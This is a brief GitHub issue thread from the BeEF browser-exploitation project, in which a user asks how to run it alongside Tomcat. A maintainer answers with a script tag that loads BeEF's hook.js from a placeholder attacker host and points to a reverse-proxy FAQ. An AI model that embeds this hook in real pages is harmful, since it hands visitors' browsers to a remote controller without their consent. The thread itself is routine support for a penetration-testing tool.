### ISSUE TITLE
Beef with tomcat or other servers ?

### ISSUE THREAD

**Issue by snimavat** [beefproject/beef#1300]
Is there anyway that Beef can be used with thirdparty servers ? like tomcat ?
I dont see any example/documentation regarding the same..

Any hints ?

**Comment by bcoles** [comment]
Hi @snimavat 

I'm not sure what you mean. You can embed the hook on any webpage, like so: `<script type='text/javascript' src='http://BeEF_Host:BeEF_Port/hook.js'></script>`

You can run BeEF behind a reverse proxy, if that helps. Check out: https://github.com/beefproject/beef/wiki/FAQ#how-do-i-configure-beef-on-a-server-behind-nat
